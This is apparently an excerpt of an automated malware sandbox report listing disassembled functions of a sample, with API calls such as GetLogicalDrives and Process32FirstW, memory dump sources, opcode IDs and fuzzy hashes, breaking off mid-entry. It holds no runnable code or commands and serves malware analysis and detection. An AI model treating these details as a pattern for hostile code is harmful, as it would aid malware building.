                                                      • Instruction ID: a9d43194ee4317c24069096338cb5e2cfcf38eb791484dcdfe4ece809f9dbf90
                                                      • Opcode Fuzzy Hash: 648050de862f593c2f048bef1ee0dd300df5403cf902d150eb21453c315fcbf6
                                                      • Instruction Fuzzy Hash: 7941E6EB2EC115BD7282B555AB58AFBA76EE6D77B0B30843BF403D1502E2D54E0D9031
                                                      Function 07780CD1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 271d158a1bcbeaea689f7516dd12b44e14a5b7bbc826aa99be33726dcfeaf4ee
                                                      • Instruction ID: 8c09fd276490c120ef5c8ec14fc0d03eb493c23bb58a5ceac7b6cc328565bf4a
                                                      • Opcode Fuzzy Hash: 271d158a1bcbeaea689f7516dd12b44e14a5b7bbc826aa99be33726dcfeaf4ee
                                                      • Instruction Fuzzy Hash: EF4128EB2EC115BD7282B555AB58AFBA66EE6C77B0B30843BF403D1502E2D54F0D9031
                                                      Function 077D00CE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: 22b9e45a73dc11792668fbd59b756b7d05cd8f56daf5068222fb415d97b8f355
                                                      • Instruction ID: 8cdef06ad21e7f6d0742601a37852acaf4056213ad0750f667c937aef080c4da
                                                      • Opcode Fuzzy Hash: 22b9e45a73dc11792668fbd59b756b7d05cd8f56daf5068222fb415d97b8f355
                                                      • Instruction Fuzzy Hash: DC41E6EB16C121BD624280451B28AFA6A7EE6D77F0F30A42AB807D7642F3D94E49D071
                                                      Function 077D00FD Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: c4ea9fb26830b70121bda11abaf684125114ba867e129ec2f6c024cfdfed812a
                                                      • Instruction ID: 703c9c4e3e1994bd09c7c662c94b1e19ecf020b36a53e5546a30a8972dcef898
                                                      • Opcode Fuzzy Hash: c4ea9fb26830b70121bda11abaf684125114ba867e129ec2f6c024cfdfed812a
                                                      • Instruction Fuzzy Hash: 904127EB16D122BD620385451B18EFA6A7EE5D77B0F34A42AF807D7642F3D84E49C031
                                                      Function 07780D64 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: aa1f9c6aac14129fde248c546c06679452e0c83db56fb031089ee5fd976d7946
                                                      • Instruction ID: 37db9498aa01cf9912a688675ffd3442ab41bf23e8749d43360a5fbd6a74fad6
                                                      • Opcode Fuzzy Hash: aa1f9c6aac14129fde248c546c06679452e0c83db56fb031089ee5fd976d7946
                                                      • Instruction Fuzzy Hash: 1D41F7EB1EC115BD7282B5559B98AFBA66EF6D77B0B30843BF403D1502E2D54A0DD031
                                                      Function 07780D2F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 48985837cbeac97491b3451d0440367ecf4e86673a6c6931781b99315c95d453
                                                      • Instruction ID: d1de60eb860117e9ddd1b0d78f62c74e9909b6ad229ae6d6947004038368ef81
                                                      • Opcode Fuzzy Hash: 48985837cbeac97491b3451d0440367ecf4e86673a6c6931781b99315c95d453
                                                      • Instruction Fuzzy Hash: A2410BEB19C111ADA28275559B986FBA76EF6D72B0B30843BF403D6602E2D54B0DD131
                                                      Function 07780D10 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 1ae0aabee36b7d5429db0ac516dca3fda0bbce2c0848379f8d7bc0139e64204f
                                                      • Instruction ID: c50fb9af68aef966e11dc029ebbd07d0dbc1d22f1f5a194382f57a5887047fee
                                                      • Opcode Fuzzy Hash: 1ae0aabee36b7d5429db0ac516dca3fda0bbce2c0848379f8d7bc0139e64204f
                                                      • Instruction Fuzzy Hash: C34127EB2EC111BD6282B555DB99AFBA66EF6C72B0B30843BF403D6502E2D54A0DD031
                                                      Function 07780D4C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 5d9a46eae58f40cef3c238ba31c09402c324c90117dbd3b29b54d9dce1895725
                                                      • Instruction ID: 090cdffdb06b52d5261bfaa9b06d3a864b3d764da496bacd0b7b3a412b8d1b58
                                                      • Opcode Fuzzy Hash: 5d9a46eae58f40cef3c238ba31c09402c324c90117dbd3b29b54d9dce1895725
                                                      • Instruction Fuzzy Hash: E13119EB2EC111BE7281B555DB98AFB666EE6D76B0B30843BF403D6502E2D58A0D9031
                                                      Function 07780D73 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 07780DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893523025.0000000007780000.00000040.00001000.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7780000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 68b56e802691be9849f8a2ce3736ebbb3d88933398fd4a15d4140137723e6a0b
                                                      • Instruction ID: 0ee690be7ecf4d58dfa15d25caea14ad96ef9ea9ecb4b62da79b5a05f97a1d0f
                                                      • Opcode Fuzzy Hash: 68b56e802691be9849f8a2ce3736ebbb3d88933398fd4a15d4140137723e6a0b
                                                      • Instruction Fuzzy Hash: 14313BEB2AC115BEA28275159B94AF7676EF7D76B0B30843BF403D2502E2D54A0DD131
                                                      Function 077D0141 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: lI2;
                                                      • API String ID: 0-1938070717
                                                      • Opcode ID: 4aaeb81bf21b0dcd6dc1196ae7c921c0cd6fce39b38a2b4abf60926482c2462a
                                                      • Instruction ID: d6443aed96f61171059f406a55b3816e96311d2d95db2b11f9e0c45143b1f813
                                                      • Opcode Fuzzy Hash: 4aaeb81bf21b0dcd6dc1196ae7c921c0cd6fce39b38a2b4abf60926482c2462a
                                                      • Instruction Fuzzy Hash: D23106EB16D122BD610280451B28EFA167EE5D77F0F34A42AB80BD7642F3D98E49C071
                                                      Function 077D01E1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: lI2;
                                                      • API String ID: 0-1938070717
                                                      • Opcode ID: ba0b9ccd56d94d5e4d5f64187c5b803e7435e690abc11d36f73f3f8fe4271043
                                                      • Instruction ID: 2f5d50b6e8c960ef888b34b93716ca5bf71cc0b09f58093814998442ecf4c35b
                                                      • Opcode Fuzzy Hash: ba0b9ccd56d94d5e4d5f64187c5b803e7435e690abc11d36f73f3f8fe4271043
                                                      • Instruction Fuzzy Hash: 7531F8EB16D122BD620281451B28EFA5A3EE5D77F0F34A42AF807D7642F3D58E4AC071
                                                      Function 077D014A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: 1343f587ad14c0d05ee0bd815bc09eb40f106ba5e91b8cf4502f7fb6bd9178aa
                                                      • Instruction ID: 24744ed04b36a58603ef0b9cfb9e76d7562665fa9a925b9d79cf5346da2d155d
                                                      • Opcode Fuzzy Hash: 1343f587ad14c0d05ee0bd815bc09eb40f106ba5e91b8cf4502f7fb6bd9178aa
                                                      • Instruction Fuzzy Hash: 9931F2EB17C122BD610285451B28EFA563EE5E77B0F34A42AB807D7642F3D98E4AC071
                                                      Function 077D0179 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: 8597f44fbb309fa20e0e6d3e41c413b9b676040802f5ce97cb0077dce6aa5519
                                                      • Instruction ID: 01b1fc0bccd684d31de00e5a5f2d3845a440bab012339a001842e6ea67ca37ee
                                                      • Opcode Fuzzy Hash: 8597f44fbb309fa20e0e6d3e41c413b9b676040802f5ce97cb0077dce6aa5519
                                                      • Instruction Fuzzy Hash: 7731D8EB16D122BE620281451B68EFA567EE5D77F0F30A42AF807D7642F3D54E49C071
                                                      Function 077D0197 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: 541ee4815d1ae9baed9f9487f92c64ea23599b738f66df0ff83f4b8aff3a4693
                                                      • Instruction ID: 3f063f74e3298ff0fdb2b08a760e18686572edcaf722c7aa0b9b208784ab7a22
                                                      • Opcode Fuzzy Hash: 541ee4815d1ae9baed9f9487f92c64ea23599b738f66df0ff83f4b8aff3a4693
                                                      • Instruction Fuzzy Hash: 2E31E6EB16D122FE620285451F18EFA663EE5D77B0F30A42AF807D7641E3D88E49C071
                                                      Function 077D01AB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: 7843b7ca7a310f0e9d7eea8d4ccf348f629d1938ea16a6e8014baf38bcca6ba8
                                                      • Instruction ID: 3d556be9c8db3fc5635590075ae26ae92c33677d6c56a7ef6af67e3a9e8db6b6
                                                      • Opcode Fuzzy Hash: 7843b7ca7a310f0e9d7eea8d4ccf348f629d1938ea16a6e8014baf38bcca6ba8
                                                      • Instruction Fuzzy Hash: 3731F7EB16D122BE624284451B28EFA577EE5D77B0F34A42AF807D7602F3D58E4AC071
                                                      Function 077D01F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: lI2;
                                                      • API String ID: 2623510744-1938070717
                                                      • Opcode ID: 66d9c0eb306f78f9dbc6db9c82fe8fd41e3b7815c2758189c304800992a6b373
                                                      • Instruction ID: 9837e238f6a5f4743a15001d72eba1c28480dd4fbc640c4dd3bd059ff5d3e37d
                                                      • Opcode Fuzzy Hash: 66d9c0eb306f78f9dbc6db9c82fe8fd41e3b7815c2758189c304800992a6b373
                                                      • Instruction Fuzzy Hash: 9D31E6EB16D122BD614284451B68EFA167EE5E77B0F30A52AB807D7641E3D88E4AC071
                                                      Function 077D0249 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 600c129964d7ba1fe8f53d0402fb04aa44dc1838623dcfbc3c1e9de24e937002
                                                      • Instruction ID: f1b64abe3160aa7e175a0435c2ed14949ddffff08f82b9a0fd5310bcb941101e
                                                      • Opcode Fuzzy Hash: 600c129964d7ba1fe8f53d0402fb04aa44dc1838623dcfbc3c1e9de24e937002
                                                      • Instruction Fuzzy Hash: 5C21F7E757D122BEA243C4451B68EFA267EE5D77B0F30A52AB407C7602E3C45E49C071
                                                      Function 077D0222 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 77d7e61dbea474895eaf1bd2bb4a9573bad065fd9f396a7267df862bf9010859
                                                      • Instruction ID: 41732b5a041391a48ac15ca75633fb9fdb359d1c3572756b729693929d0841a6
                                                      • Opcode Fuzzy Hash: 77d7e61dbea474895eaf1bd2bb4a9573bad065fd9f396a7267df862bf9010859
                                                      • Instruction Fuzzy Hash: 7221D3E757D122BE624280451F68EFA1A3EA5D77B0F34A52AB807C7A42E3C48E49C071
                                                      Function 07770974 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 0815c0f3b5d71aeec4ab0f4c8327bee7b36b14ae9af7d90ecaecb4e4e42bf2e2
                                                      • Instruction ID: 8bfdcf3f05b6863ee86d8f3557ade941d5998142e743201e1d875bb7bf30978a
                                                      • Opcode Fuzzy Hash: 0815c0f3b5d71aeec4ab0f4c8327bee7b36b14ae9af7d90ecaecb4e4e42bf2e2
                                                      • Instruction Fuzzy Hash: E271C1FB12C211BDB902C5916F64EFBA76EE5C77B0B30882BF807D6602E2944B59D131
                                                      Function 0777096F Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 9ecdf340cf8a721bbd7b952ba651a112e0b89bba80c418cde1058df466511f6b
                                                      • Instruction ID: cb06f5fb125a4a198198c3af43821aef70060ff6d2b74543d36bda9dca4a506e
                                                      • Opcode Fuzzy Hash: 9ecdf340cf8a721bbd7b952ba651a112e0b89bba80c418cde1058df466511f6b
                                                      • Instruction Fuzzy Hash: DC71B0EB12C215BC7902D1916F64EFBA76EE5C77B0F30882BF807D6602E2944B5AD131
                                                      Function 077D026F Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 80eb95ddd45957b2548526654f7aaf2d4a4d3d62195f249fdca5b8dff2cbc41c
                                                      • Instruction ID: eb9025bca41c832f20965fd08abbf33eb2a2be22776ebbe980b61155d675ef29
                                                      • Opcode Fuzzy Hash: 80eb95ddd45957b2548526654f7aaf2d4a4d3d62195f249fdca5b8dff2cbc41c
                                                      • Instruction Fuzzy Hash: 9421B4EB57D122BE614280452F68EFA167EF5D77B0F30E52AB807D6601E3C88E49C471
                                                      Function 077D02AE Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 696221e87bba03b3d0773b5f63588fb4389e565fbce3845d9377c443e3e711a3
                                                      • Instruction ID: 669b96dffe76f059ffba3f302bee17e478e19b002c9bad73a251d05e5897a5e6
                                                      • Opcode Fuzzy Hash: 696221e87bba03b3d0773b5f63588fb4389e565fbce3845d9377c443e3e711a3
                                                      • Instruction Fuzzy Hash: 2611B6E757C122BE614280456F68EFA167EF6D77B0F34E52AB807D6601E3C84E49D071
                                                      Function 0777099C Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 0ea419ad4eae5561c68eb2177a3d68a013ce29d8998ecc1381f9b58f0e632ddf
                                                      • Instruction ID: b191101565feb234869ee024b6bc58895fa17cc6977ca4b9436db340e2db0e2c
                                                      • Opcode Fuzzy Hash: 0ea419ad4eae5561c68eb2177a3d68a013ce29d8998ecc1381f9b58f0e632ddf
                                                      • Instruction Fuzzy Hash: E161D2EB12C215BDB902C5916F54EFB676EE5C77B0F30882BF807D6202E2944B5AD131
                                                      Function 077D02D7 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: dd1bd1c10920bc5a9901e017fdf3053ba314c733738321cf7b8efb33b7ca08df
                                                      • Instruction ID: dc3c830481c81f2f9c576626d0764aa60470e775994e3799c1ce73b8fcca7576
                                                      • Opcode Fuzzy Hash: dd1bd1c10920bc5a9901e017fdf3053ba314c733738321cf7b8efb33b7ca08df
                                                      • Instruction Fuzzy Hash: 1E11A3E756C522BE614280551F68EFA573EE4E77B1F34A42AB807DB602E3C48F4AC071
                                                      Function 077709E7 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 386964d7793331279045157d93fd28d90d08a62f86c44fb638acd8e025244461
                                                      • Instruction ID: 87b1fd1b707e4e09bf235a783215150dea8a4c0328d9f99ff8703fa44a2c2481
                                                      • Opcode Fuzzy Hash: 386964d7793331279045157d93fd28d90d08a62f86c44fb638acd8e025244461
                                                      • Instruction Fuzzy Hash: 0C61C1EB12C215BCB902C5916F54EFBA76EE5C77B0F30882BF807D6202E2844B5AD131
                                                      Function 077D02F0 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 5a2e39b02bf5b1b3ab667375b3f0f9d0508f0f4d3505e86f0107da72a3eda0a2
                                                      • Instruction ID: c0f12fae1e7f981b1cefc465d8bf491eea496c582145636e7f4e20a2f17a0c9a
                                                      • Opcode Fuzzy Hash: 5a2e39b02bf5b1b3ab667375b3f0f9d0508f0f4d3505e86f0107da72a3eda0a2
                                                      • Instruction Fuzzy Hash: 5B1186DB66C112BE614280555B6CEF61A3FE4D77F0F35E52AB807C6606E3C48E4AD0B1
                                                      Function 077709C7 Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 05789bb8b5503db0874251dc1dc4b60c2b6ff0a7301e7e25630ef835796dc0df
                                                      • Instruction ID: 7dac2f46cd1b63343445ee1608be77f299407e6c5bd431bad17d178d4af468cc
                                                      • Opcode Fuzzy Hash: 05789bb8b5503db0874251dc1dc4b60c2b6ff0a7301e7e25630ef835796dc0df
                                                      • Instruction Fuzzy Hash: 0361D2EB12C215BCB902D1916F54EFBA76EE5C77B0F30882BF807D6602E2944B5AD131
                                                      Function 077D030E Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: ce0470698203abb99f5d69e9d8c2dc5c09ae0e9c2a00edd1649c7e14021f0a78
                                                      • Instruction ID: 5c4ebdea3eb3e0510c1ec26197e40e5678ea79b92bfefadb97cae9708e01ec4e
                                                      • Opcode Fuzzy Hash: ce0470698203abb99f5d69e9d8c2dc5c09ae0e9c2a00edd1649c7e14021f0a78
                                                      • Instruction Fuzzy Hash: 5111C4DB17C112BE610280551B68EF6163FE0E77B0F34F92AB407D6A02E3C84E4AC071
                                                      Function 077709D4 Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
